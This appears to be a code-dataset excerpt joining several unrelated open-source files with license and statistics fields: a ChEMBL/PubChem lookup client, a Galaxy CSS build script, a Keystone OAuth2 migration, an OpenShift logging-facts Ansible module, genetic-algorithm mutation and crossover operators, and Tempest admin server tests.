response from a query returning activities for a drug
Returns
-------
targ_act_dict : dict
dictionary keyed to ChEMBL target ids with lists of activity ids
"""
targ_act_dict = defaultdict(lambda: [])
for activity in activities:
target_chembl_id = activity['target_chembl_id']
activity_id = activity['activity_id']
targ_act_dict[target_chembl_id].append(activity_id)
for target_chembl_id in targ_act_dict:
targ_act_dict[target_chembl_id] = \
list(set(targ_act_dict[target_chembl_id]))
return targ_act_dict
def get_protein_targets_only(target_chembl_ids):
"""Given list of ChEMBL target ids, return dict of SINGLE PROTEIN targets
Parameters
----------
target_chembl_ids : list
list of chembl_ids as strings
Returns
-------
protein_targets : dict
dictionary keyed to ChEMBL target ids with lists of activity ids
"""
protein_targets = {}
for target_chembl_id in target_chembl_ids:
target = query_target(target_chembl_id)
if 'SINGLE PROTEIN' in target['target_type']:
protein_targets[target_chembl_id] = target
return protein_targets
def get_evidence(assay):
"""Given an activity, return an INDRA Evidence object.
Parameters
----------
assay : dict
an activity from the activities list returned by a query to the API
Returns
-------
ev : :py:class:`Evidence`
an :py:class:`Evidence` object containing the kinetics of the
"""
kin = get_kinetics(assay)
source_id = assay.get('assay_chembl_id')
if not kin:
return None
annotations = {'kinetics': kin}
chembl_doc_id = str(assay.get('document_chembl_id'))
pmid = get_pmid(chembl_doc_id)
ev = Evidence(source_api='chembl', pmid=pmid, source_id=source_id,
annotations=annotations)
return ev
def get_kinetics(assay):
"""Given an activity, return its kinetics values.
Parameters
----------
assay : dict
an activity from the activities list returned by a query to the API
Returns
-------
kin : dict
dictionary of values with units keyed to value types 'IC50', 'EC50',
'INH', 'Potency', 'Kd'
"""
try:
val = float(assay.get('standard_value'))
except TypeError:
logger.warning('Invalid assay value: %s' % assay.get('standard_value'))
return None
unit = assay.get('standard_units')
if unit == 'nM':
unit_sym = 1e-9 * units.mol / units.liter
elif unit == 'uM':
unit_sym = 1e-6 * units.mol / units.liter
else:
logger.warning('Unhandled unit: %s' % unit)
return None
param_type = assay.get('standard_type')
if param_type not in ['IC50', 'EC50', 'INH', 'Potency', 'Kd']:
logger.warning('Unhandled parameter type: %s' % param_type)
logger.info(str(assay))
return None
kin = {param_type: val * unit_sym}
return kin
def get_pmid(doc_id):
"""Get PMID from document_chembl_id
Parameters
----------
doc_id : str
Returns
-------
pmid : str
"""
url_pmid = 'https://www.ebi.ac.uk/chembl/api/data/document.json'
params = {'document_chembl_id': doc_id}
res = requests.get(url_pmid, params=params)
js = res.json()
pmid = str(js['documents'][0]['pubmed_id'])
return pmid
def get_target_chemblid(target_upid):
"""Get ChEMBL ID from UniProt upid
Parameters
----------
target_upid : str
Returns
-------
target_chembl_id : str
"""
url = 'https://www.ebi.ac.uk/chembl/api/data/target.json'
params = {'target_components__accession': target_upid}
r = requests.get(url, params=params)
r.raise_for_status()
js = r.json()
target_chemblid = js['targets'][0]['target_chembl_id']
return target_chemblid
def get_mesh_id(nlm_mesh):
"""Get MESH ID from NLM MESH
Parameters
----------
nlm_mesh : str
Returns
-------
mesh_id : str
"""
url_nlm2mesh = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi'
params = {'db': 'mesh', 'term': nlm_mesh, 'retmode': 'JSON'}
r = requests.get(url_nlm2mesh, params=params)
res = r.json()
mesh_id = res['esearchresult']['idlist'][0]
return mesh_id
def get_pcid(mesh_id):
"""Get PC ID from MESH ID
Parameters
----------
mesh : str
Returns
-------
pcid : str
"""
url_mesh2pcid = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/elink.fcgi'
params = {'dbfrom': 'mesh', 'id': mesh_id,
'db': 'pccompound', 'retmode': 'JSON'}
r = requests.get(url_mesh2pcid, params=params)
res = r.json()
pcid = res['linksets'][0]['linksetdbs'][0]['links'][0]
return pcid
def get_chembl_id(nlm_mesh):
"""Get ChEMBL ID from NLM MESH
Parameters
----------
nlm_mesh : str
Returns
-------
chembl_id : str
"""
mesh_id = get_mesh_id(nlm_mesh)
pcid = get_pcid(mesh_id)
url_mesh2pcid = 'https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/' + \
'cid/%s/synonyms/JSON' % pcid
r = requests.get(url_mesh2pcid)
res = r.json()
synonyms = res['InformationList']['Information'][0]['Synonym']
chembl_id = [syn for syn in synonyms
if 'CHEMBL' in syn and 'SCHEMBL' not in syn][0]
return chembl_id
| bsd-2-clause | 1,453,831,027,947,524,400 | 28.431818 | 79 | 0.592568 | false |
volpino/Yeps-EURAC | static/june_2007_style/make_style.py | 1 | 3931 | #!/usr/bin/env python
#from galaxy import eggs
#import pkg_resources
#pkg_resources.require("Cheetah")
import sys, string, os.path, tempfile, subprocess
#from galaxy import eggs
import pkg_resources
pkg_resources.require( "Cheetah" )
from Cheetah.Template import Template
from subprocess import Popen, PIPE
assert sys.version_info[:2] >= ( 2, 4 )
# To create a new style ( this is an example ):
# python make_style.py blue_colors.ini blue
def run( cmd ):
return Popen( cmd, stdout=PIPE).communicate()[0]
templates = [ ( "base.css.tmpl", "base.css" ),
( "panel_layout.css.tmpl", "panel_layout.css" ),
( "masthead.css.tmpl", "masthead.css"),
( "library.css.tmpl", "library.css"),
( "history.css.tmpl", "history.css" ),
( "tool_menu.css.tmpl", "tool_menu.css" ),
( "iphone.css.tmpl", "iphone.css" ),
( "reset.css.tmpl", "reset.css" ),
( "autocomplete_tagging.css.tmpl", "autocomplete_tagging.css") ]
images = [
( "./gradient.py 9 30 $panel_header_bg_top - $panel_header_bg_bottom 0 0 $panel_header_bg_bottom 1 1", "panel_header_bg.png" ),
( "./gradient.py 9 30 $panel_header_bg_bottom - $panel_header_bg_top 0 0 $panel_header_bg_top 1 1", "panel_header_bg_pressed.png" ),
( "./gradient.py 9 1000 $menu_bg_top $menu_bg_hatch $menu_bg_over 0 0 $menu_bg_over 1 1", "menu_bg.png" ),
( "./gradient.py 9 1000 $base_bg_top - $base_bg_bottom 0 0 $base_bg_bottom 1 1", "base_bg.png" ),
( "./gradient.py 9 500 $form_body_bg_top - $form_body_bg_bottom 0 0 $form_body_bg_bottom 1 1", "form_body_bg.png" ),
( "./gradient.py 9 50 $masthead_bg $masthead_bg_hatch", "masthead_bg.png" ),
( "./gradient.py 9 30 $footer_title_bg $footer_title_hatch 000000 0 0.5 000000 1 1", "footer_title_bg.png" ),
( "./gradient.py 9 50 $form_title_bg_top $form_title_bg_hatch $form_title_bg_bottom 0 0 $form_title_bg_bottom 1 1", "form_title_bg.png" ),
( "./gradient.py 9 200 $history_ok_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "ok_bg.png" ),
( "./gradient.py 9 200 $history_error_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "error_bg.png" ),
( "./gradient.py 9 200 $history_running_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "warn_bg.png" ),
( "./gradient.py 9 200 $history_queued_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "gray_bg.png" ),
( "./callout_top.py 20 10 $panel_header_bg_top $layout_border", "popupmenu_callout_top.png" ),
( "./circle.py 12 #FFFFFF #D8B365 right > workflow_circle_open.png" ),
( "./circle.py 12 #BBFFBB #D8B365 right > workflow_circle_green.png" ),
( "./circle.py 12 #FFFFFF #D8B365 none> workflow_circle_drag.png" ),
]
shared_images = [
# Dialog boxes
( "ok_large.png", "done_message_bg", "done_message_icon.png" ),
( "info_large.png", "info_message_bg", "info_message_icon.png" ),
( "warn_large.png", "warn_message_bg", "warn_message_icon.png" ),
( "error_large.png", "error_message_bg", "error_message_icon.png" ),
# History icons
( "ok_small.png", "history_ok_bg", "data_ok.png" ),
( "error_small.png", "history_error_bg", "data_error.png" ),
( "wait_small.png", "history_queued_bg", "data_queued.png" ),
]
vars, out_dir = sys.argv[1:]
for input, output in templates:
print input ,"->", output
subprocess.call( "./process_css.py %s %s < %s > %s" % ( vars, out_dir, input, os.path.join( out_dir, output ) ), shell=True )
"""
for rule, output in images:
t = string.Template( rule ).substitute( context )
print t, "->", output
open( os.path.join( out_dir, output ), "w" ).write( run( t.split() ) )
for src, bg, out in shared_images:
t = "./png_over_color.py shared_images/%s %s %s" % ( src, context[bg], os.path.join( out_dir, out ) )
print t
run( t.split() )
"""
| mit | -27,098,766,214,723 | 46.939024 | 149 | 0.59247 | false |
ging/keystone-oauth2-extension | oauth2/migrate_repo/versions/007_on_delete_cascade_on_consumer_credentials_client_id.py | 2 | 2648 | # Copyright (C) 2014 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# Copyright (C) 2014 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
from migrate.changeset.constraint import ForeignKeyConstraint
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
if 'mysql' in str(meta):
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1', ondelete='CASCADE').create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = sql.MetaData()
meta.bind = migrate_engine
if 'mysql' in str(meta):
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1', ondelete='CASCADE').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1').create()
| apache-2.0 | 676,433,779,511,974,300 | 39.121212 | 98 | 0.700151 | false |
ivanhorvath/openshift-tools | openshift/installer/vendored/openshift-ansible-3.9.14-1/roles/openshift_logging/library/openshift_logging_facts.py | 11 | 15078 | '''
---
module: openshift_logging_facts
version_added: ""
short_description: Gather facts about the OpenShift logging stack
description:
- Determine the current facts about the OpenShift logging stack (e.g. cluster size)
options:
author: Red Hat, Inc
'''
import copy
import json
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
from subprocess import * # noqa: F402,F403
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
from ansible.module_utils.basic import * # noqa: F402,F403
import yaml
EXAMPLES = """
- action: opneshift_logging_facts
"""
RETURN = """
"""
DEFAULT_OC_OPTIONS = ["-o", "json"]
# constants used for various labels and selectors
COMPONENT_KEY = "component"
LOGGING_INFRA_KEY = "logging-infra"
# selectors for filtering resources
DS_FLUENTD_SELECTOR = LOGGING_INFRA_KEY + "=" + "fluentd"
LOGGING_SELECTOR = LOGGING_INFRA_KEY + "=" + "support"
ROUTE_SELECTOR = "component=support,logging-infra=support,provider=openshift"
COMPONENTS = ["kibana", "curator", "elasticsearch", "fluentd", "kibana_ops", "curator_ops", "elasticsearch_ops"]
class OCBaseCommand(object):
''' The base class used to query openshift '''
def __init__(self, binary, kubeconfig, namespace):
''' the init method of OCBaseCommand class '''
self.binary = binary
self.kubeconfig = kubeconfig
self.user = self.get_system_admin(self.kubeconfig)
self.namespace = namespace
# pylint: disable=no-self-use
def get_system_admin(self, kubeconfig):
''' Retrieves the system admin '''
with open(kubeconfig, 'r') as kubeconfig_file:
config = yaml.load(kubeconfig_file)
for user in config["users"]:
if user["name"].startswith("system:admin"):
return user["name"]
raise Exception("Unable to find system:admin in: " + kubeconfig)
# pylint: disable=too-many-arguments, dangerous-default-value
def oc_command(self, sub, kind, namespace=None, name=None, add_options=None):
''' Wrapper method for the "oc" command '''
cmd = [self.binary, sub, kind]
if name is not None:
cmd = cmd + [name]
if namespace is not None:
cmd = cmd + ["-n", namespace]
if add_options is None:
add_options = []
cmd = cmd + ["--user=" + self.user, "--config=" + self.kubeconfig] + DEFAULT_OC_OPTIONS + add_options
try:
process = Popen(cmd, stdout=PIPE, stderr=PIPE) # noqa: F405
out, err = process.communicate(cmd)
if len(err) > 0:
if 'not found' in err:
return {'items': []}
if 'No resources found' in err:
return {'items': []}
raise Exception(err)
except Exception as excp:
err = "There was an exception trying to run the command '" + " ".join(cmd) + "' " + str(excp)
raise Exception(err)
return json.loads(out)
class OpenshiftLoggingFacts(OCBaseCommand):
''' The class structure for holding the OpenshiftLogging Facts'''
name = "facts"
def __init__(self, logger, binary, kubeconfig, namespace):
''' The init method for OpenshiftLoggingFacts '''
super(OpenshiftLoggingFacts, self).__init__(binary, kubeconfig, namespace)
self.logger = logger
self.facts = dict()
def default_keys_for(self, kind):
''' Sets the default key values for kind '''
for comp in COMPONENTS:
self.add_facts_for(comp, kind)
def add_facts_for(self, comp, kind, name=None, facts=None):
''' Add facts for the provided kind '''
if comp not in self.facts:
self.facts[comp] = dict()
if kind not in self.facts[comp]:
self.facts[comp][kind] = dict()
if name:
self.facts[comp][kind][name] = facts
def facts_for_routes(self, namespace):
''' Gathers facts for Routes in logging namespace '''
self.default_keys_for("routes")
route_list = self.oc_command("get", "routes", namespace=namespace, add_options=["-l", ROUTE_SELECTOR])
if len(route_list["items"]) == 0:
return None
for route in route_list["items"]:
name = route["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
self.add_facts_for(comp, "routes", name, dict(host=route["spec"]["host"]))
self.facts["agl_namespace"] = namespace
def facts_for_daemonsets(self, namespace):
''' Gathers facts for Daemonsets in logging namespace '''
self.default_keys_for("daemonsets")
ds_list = self.oc_command("get", "daemonsets", namespace=namespace,
add_options=["-l", LOGGING_INFRA_KEY + "=fluentd"])
if len(ds_list["items"]) == 0:
return
for ds_item in ds_list["items"]:
name = ds_item["metadata"]["name"]
comp = self.comp(name)
spec = ds_item["spec"]["template"]["spec"]
container = spec["containers"][0]
result = dict(
selector=ds_item["spec"]["selector"],
image=container["image"],
resources=container["resources"],
nodeSelector=spec["nodeSelector"],
serviceAccount=spec["serviceAccount"],
terminationGracePeriodSeconds=spec["terminationGracePeriodSeconds"]
)
self.add_facts_for(comp, "daemonsets", name, result)
def facts_for_pvcs(self, namespace):
''' Gathers facts for PVCS in logging namespace'''
self.default_keys_for("pvcs")
pvclist = self.oc_command("get", "pvc", namespace=namespace, add_options=["-l", LOGGING_INFRA_KEY])
if len(pvclist["items"]) == 0:
return
for pvc in pvclist["items"]:
name = pvc["metadata"]["name"]
comp = self.comp(name)
self.add_facts_for(comp, "pvcs", name, dict())
def facts_for_deploymentconfigs(self, namespace):
''' Gathers facts for DeploymentConfigs in logging namespace '''
self.default_keys_for("deploymentconfigs")
dclist = self.oc_command("get", "deploymentconfigs", namespace=namespace, add_options=["-l", LOGGING_INFRA_KEY])
if len(dclist["items"]) == 0:
return
dcs = dclist["items"]
for dc_item in dcs:
name = dc_item["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
spec = dc_item["spec"]["template"]["spec"]
facts = dict(
name=name,
selector=dc_item["spec"]["selector"],
replicas=dc_item["spec"]["replicas"],
serviceAccount=spec["serviceAccount"],
containers=dict(),
volumes=dict()
)
if "nodeSelector" in spec:
facts["nodeSelector"] = spec["nodeSelector"]
if "supplementalGroups" in spec["securityContext"]:
facts["storageGroups"] = spec["securityContext"]["supplementalGroups"]
facts["spec"] = spec
if "volumes" in spec:
for vol in spec["volumes"]:
clone = copy.deepcopy(vol)
clone.pop("name", None)
facts["volumes"][vol["name"]] = clone
for container in spec["containers"]:
facts["containers"][container["name"]] = container
self.add_facts_for(comp, "deploymentconfigs", name, facts)
def facts_for_services(self, namespace):
''' Gathers facts for services in logging namespace '''
self.default_keys_for("services")
servicelist = self.oc_command("get", "services", namespace=namespace, add_options=["-l", LOGGING_SELECTOR])
if len(servicelist["items"]) == 0:
return
for service in servicelist["items"]:
name = service["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
self.add_facts_for(comp, "services", name, dict())
# pylint: disable=too-many-arguments
def facts_from_configmap(self, comp, kind, name, config_key, yaml_file=None):
'''Extracts facts in logging namespace from configmap'''
if yaml_file is not None:
if config_key.endswith(".yml") or config_key.endswith(".yaml"):
config_facts = yaml.load(yaml_file)
self.facts[comp][kind][name][config_key] = config_facts
self.facts[comp][kind][name][config_key]["raw"] = yaml_file
def facts_for_configmaps(self, namespace):
''' Gathers facts for configmaps in logging namespace '''
self.default_keys_for("configmaps")
a_list = self.oc_command("get", "configmaps", namespace=namespace)
if len(a_list["items"]) == 0:
return
for item in a_list["items"]:
name = item["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
self.add_facts_for(comp, "configmaps", name, dict(item["data"]))
if comp in ["elasticsearch", "elasticsearch_ops"]:
for config_key in item["data"]:
self.facts_from_configmap(comp, "configmaps", name, config_key, item["data"][config_key])
def facts_for_oauthclients(self, namespace):
''' Gathers facts for oauthclients used with logging '''
self.default_keys_for("oauthclients")
a_list = self.oc_command("get", "oauthclients", namespace=namespace, add_options=["-l", LOGGING_SELECTOR])
if len(a_list["items"]) == 0:
return
for item in a_list["items"]:
name = item["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
result = dict(
redirectURIs=item["redirectURIs"]
)
self.add_facts_for(comp, "oauthclients", name, result)
def facts_for_secrets(self, namespace):
''' Gathers facts for secrets in the logging namespace '''
self.default_keys_for("secrets")
a_list = self.oc_command("get", "secrets", namespace=namespace)
if len(a_list["items"]) == 0:
return
for item in a_list["items"]:
name = item["metadata"]["name"]
comp = self.comp(name)
if comp is not None and item["type"] == "Opaque":
result = dict(
keys=item["data"].keys()
)
self.add_facts_for(comp, "secrets", name, result)
def facts_for_sccs(self):
''' Gathers facts for SCCs used with logging '''
self.default_keys_for("sccs")
scc = self.oc_command("get", "scc", name="privileged")
if len(scc["users"]) == 0:
return
for item in scc["users"]:
comp = self.comp(item)
if comp is not None:
self.add_facts_for(comp, "sccs", "privileged", dict())
def facts_for_clusterrolebindings(self, namespace):
''' Gathers ClusterRoleBindings used with logging '''
self.default_keys_for("clusterrolebindings")
role = self.oc_command("get", "clusterrolebindings", name="cluster-readers")
if "subjects" not in role or len(role["subjects"]) == 0:
return
for item in role["subjects"]:
comp = self.comp(item["name"])
if comp is not None and namespace == item.get("namespace"):
self.add_facts_for(comp, "clusterrolebindings", "cluster-readers", dict())
# this needs to end up nested under the service account...
def facts_for_rolebindings(self, namespace):
''' Gathers facts for RoleBindings used with logging '''
self.default_keys_for("rolebindings")
role = self.oc_command("get", "rolebindings", namespace=namespace, name="logging-elasticsearch-view-role")
if "subjects" not in role or len(role["subjects"]) == 0:
return
for item in role["subjects"]:
comp = self.comp(item["name"])
if comp is not None and namespace == item.get("namespace"):
self.add_facts_for(comp, "rolebindings", "logging-elasticsearch-view-role", dict())
# pylint: disable=no-self-use, too-many-return-statements
def comp(self, name):
''' Does a comparison to evaluate the logging component '''
if name.startswith("logging-curator-ops"):
return "curator_ops"
elif name.startswith("logging-kibana-ops") or name.startswith("kibana-ops"):
return "kibana_ops"
elif name.startswith("logging-es-ops") or name.startswith("logging-elasticsearch-ops"):
return "elasticsearch_ops"
elif name.startswith("logging-curator"):
return "curator"
elif name.startswith("logging-kibana") or name.startswith("kibana"):
return "kibana"
elif name.startswith("logging-es") or name.startswith("logging-elasticsearch"):
return "elasticsearch"
elif name.startswith("logging-fluentd") or name.endswith("aggregated-logging-fluentd"):
return "fluentd"
else:
return None
def build_facts(self):
''' Builds the logging facts and returns them '''
self.facts_for_routes(self.namespace)
self.facts_for_daemonsets(self.namespace)
self.facts_for_deploymentconfigs(self.namespace)
self.facts_for_services(self.namespace)
self.facts_for_configmaps(self.namespace)
self.facts_for_sccs()
self.facts_for_oauthclients(self.namespace)
self.facts_for_clusterrolebindings(self.namespace)
self.facts_for_rolebindings(self.namespace)
self.facts_for_secrets(self.namespace)
self.facts_for_pvcs(self.namespace)
return self.facts
def main():
''' The main method '''
module = AnsibleModule( # noqa: F405
argument_spec=dict(
admin_kubeconfig={"default": "/etc/origin/master/admin.kubeconfig", "type": "str"},
oc_bin={"required": True, "type": "str"},
openshift_logging_namespace={"required": True, "type": "str"}
),
supports_check_mode=False
)
try:
cmd = OpenshiftLoggingFacts(module, module.params['oc_bin'], module.params['admin_kubeconfig'],
module.params['openshift_logging_namespace'])
module.exit_json(
ansible_facts={"openshift_logging_facts": cmd.build_facts()}
)
# ignore broad-except error to avoid stack trace to ansible user
# pylint: disable=broad-except
except Exception as error:
module.fail_json(msg=str(error))
if __name__ == '__main__':
main()
| apache-2.0 | 8,371,110,768,455,680,000 | 41.473239 | 120 | 0.582239 | false |
crazyskady/ai-game-python | Chapter05/Improvement.py | 1 | 4989 | # -*- coding: utf-8 -*-
import random
MUTATION_RATE = 0.2
def ChooseSection(max_span, min_span):
beg = random.randint(0, max_span-min_span)
end = random.randint(min_span + beg, max_span)
return beg, end
# 散播变异
# 1. 在染色体上随机的选择一对位置
# 2. 将这一对位置中间的值进行随机的位置交换
def MutateSM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
span = end - beg
NumberOfSwapsRqd = span - 1
while NumberOfSwapsRqd != 0:
idx1 = beg + random.randint(0, span)
idx2 = beg + random.randint(0, span)
chromo[idx1], chromo[idx2] = chromo[idx2], chromo[idx1]
NumberOfSwapsRqd = NumberOfSwapsRqd - 1
return chromo
# 移位变异
# 1. 在染色体上随机的选择一对位置
# 2. 将这一对位置中间的值全部随机的移到剩余染色体中间的任一位置
def MutateDM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
TheSection = chromo[beg:end]
TheLeft = chromo[:beg] + chromo[end:]
randPos = random.randint(0, len(TheLeft) - 1) # 如果len(TheLeft) == 0,randint会报错
newChromo = TheLeft[:randPos] + TheSection + TheLeft[randPos:]
return newChromo
# 插入变异
# 1. 随机选择一个Gen
# 2. 将选中的Gen随机的插入到染色体的其他的位置
def MutateIM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
selectedPos = random.randint(0, len(chromo) - 1)
selectedGen = [chromo[selectedPos]]
newChromo = chromo[:selectedPos] + chromo[(selectedPos + 1) :]
newPos = random.randint(0, len(newChromo)) # [1,2,3], 可以有4个位置插入新的Gen
return newChromo[:newPos] + selectedGen + newChromo[newPos:]
# 倒置变异
# 1. 在染色体上随机的选择一对位置
# 2. 将这一对位置中间的值倒置
def MutateRM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
TheSection = chromo[beg:end]
TheSection.reverse()
return chromo[:beg] + TheSection + chromo[end:]
# 倒置移位变异
# 1. 在染色体上随机的选择一对位置
# 2. 将这一对位置中间的值倒置
# 3. 将这一对位置中间的值随机插入到染色体其他位置
def MutateRDM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
TheSection = chromo[beg:end]
TheSection.reverse()
TheLeft = chromo[:beg] + chromo[end:]
randPos = random.randint(0, len(TheLeft) - 1) # 如果len(TheLeft) == 0,randint会报错
newChromo = TheLeft[:randPos] + TheSection + TheLeft[randPos:]
return newChromo
#print MutateRDM([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15])
#for i in xrange(100000):
#MutateRDM([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15])
#############################################################################################################
import copy
# 基于顺序的杂交算子
# 1. 随机选择2个以上的位置,如mum=[1,2,3,4,5], dad=[5,4,3,2,1]中选择位置(2,3),则mum中被选中的是[3,4], dad中被选中的是[3,2]
# 2. ......再想想措辞吧
def CrossoverOBX(mum, dad):
baby1 = copy.deepcopy(mum)
baby2 = copy.deepcopy(dad)
tempGens = []
Positions = []
Pos = random.randint(0, len(mum) - 2) #先随机选择第一个
while Pos < len(mum):
Positions.append(Pos)
tempGens.append(mum[Pos])
Pos += random.randint(1, len(mum)-Pos)
#print "Pos :", Positions
#print "City:", tempGens
cPos = 0
for idx, gen in enumerate(baby2):
for idx1, gen1 in enumerate(tempGens):
if gen == gen1:
#print "idx: ", idx, "city before:", baby2[idx], "city after:", tempGens[cPos]
baby2[idx] = tempGens[cPos]
cPos += 1
break
tempGens = []
for idx in xrange(len(Positions)):
tempGens.append(dad[Positions[idx]])
cPos = 0
for idx, gen in enumerate(baby1):
for idx1, gen1 in enumerate(tempGens):
if gen == gen1:
baby1[idx] = tempGens[cPos]
cPos += 1
break
return baby1, baby2
# 基于位置的杂交算子
def CrossoverPBX(mum, dad):
Positions = []
tempGens = []
Pos = random.randint(0, len(mum) - 2) #先随机选择第一个
while Pos < len(mum):
Positions.append(Pos)
tempGens.append(mum[Pos])
Pos += random.randint(1, len(mum)-Pos)
#print Positions, tempGens
baby1 = []
for i in xrange(len(dad)):
if i in Positions:
baby1.append(mum[i])
if dad[i] not in tempGens:
baby1.append(dad[i])
baby2 = []
tempGens = []
for idx in xrange(len(Positions)):
tempGens.append(dad[Positions[idx]])
for i in xrange(len(mum)):
if i in Positions:
baby2.append(dad[i])
if mum[i] not in tempGens:
baby2.append(mum[i])
return baby1, baby2
if __name__ == "__main__":
#print CrossoverPBX([1,2,3,4,5,6,7,8,9], [9,8,7,6,5,4,3,2,1])
for i in xrange(100000):
CrossoverPBX([1,2,3,4,5,6,7,8,9], [9,8,7,6,5,4,3,2,1]) | mit | -2,734,002,503,878,678,000 | 22.089005 | 109 | 0.655251 | false |
roopali8/tempest | tempest/api/compute/admin/test_servers.py | 6 | 8750 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
from tempest_lib import decorators
from tempest.api.compute import base
from tempest.common import fixed_network
from tempest import test
class ServersAdminTestJSON(base.BaseV2ComputeAdminTest):
"""
Tests Servers API using admin privileges
"""
_host_key = 'OS-EXT-SRV-ATTR:host'
@classmethod
def setup_clients(cls):
super(ServersAdminTestJSON, cls).setup_clients()
cls.client = cls.os_adm.servers_client
cls.non_admin_client = cls.servers_client
cls.flavors_client = cls.os_adm.flavors_client
@classmethod
def resource_setup(cls):
super(ServersAdminTestJSON, cls).resource_setup()
cls.s1_name = data_utils.rand_name('server')
server = cls.create_test_server(name=cls.s1_name,
wait_until='ACTIVE')
cls.s1_id = server['id']
cls.s2_name = data_utils.rand_name('server')
server = cls.create_test_server(name=cls.s2_name,
wait_until='ACTIVE')
cls.s2_id = server['id']
@test.idempotent_id('51717b38-bdc1-458b-b636-1cf82d99f62f')
def test_list_servers_by_admin(self):
# Listing servers by admin user returns empty list by default
body = self.client.list_servers_with_detail()
servers = body['servers']
self.assertEqual([], servers)
@test.idempotent_id('06f960bb-15bb-48dc-873d-f96e89be7870')
def test_list_servers_filter_by_error_status(self):
# Filter the list of servers by server error status
params = {'status': 'error'}
self.client.reset_state(self.s1_id, state='error')
body = self.non_admin_client.list_servers(params)
# Reset server's state to 'active'
self.client.reset_state(self.s1_id, state='active')
# Verify server's state
server = self.client.show_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
servers = body['servers']
# Verify error server in list result
self.assertIn(self.s1_id, map(lambda x: x['id'], servers))
self.assertNotIn(self.s2_id, map(lambda x: x['id'], servers))
@test.idempotent_id('9f5579ae-19b4-4985-a091-2a5d56106580')
def test_list_servers_by_admin_with_all_tenants(self):
# Listing servers by admin user with all tenants parameter
# Here should be listed all servers
params = {'all_tenants': ''}
body = self.client.list_servers_with_detail(params)
servers = body['servers']
servers_name = map(lambda x: x['name'], servers)
self.assertIn(self.s1_name, servers_name)
self.assertIn(self.s2_name, servers_name)
@test.idempotent_id('7e5d6b8f-454a-4ba1-8ae2-da857af8338b')
def test_list_servers_by_admin_with_specified_tenant(self):
# In nova v2, tenant_id is ignored unless all_tenants is specified
# List the primary tenant but get nothing due to odd specified behavior
tenant_id = self.non_admin_client.tenant_id
params = {'tenant_id': tenant_id}
body = self.client.list_servers_with_detail(params)
servers = body['servers']
self.assertEqual([], servers)
# List the admin tenant which has no servers
admin_tenant_id = self.client.tenant_id
params = {'all_tenants': '', 'tenant_id': admin_tenant_id}
body = self.client.list_servers_with_detail(params)
servers = body['servers']
self.assertEqual([], servers)
@test.idempotent_id('86c7a8f7-50cf-43a9-9bac-5b985317134f')
def test_list_servers_filter_by_exist_host(self):
# Filter the list of servers by existent host
name = data_utils.rand_name('server')
flavor = self.flavor_ref
image_id = self.image_ref
network = self.get_tenant_network()
network_kwargs = fixed_network.set_networks_kwarg(network)
test_server = self.client.create_server(name, image_id, flavor,
**network_kwargs)
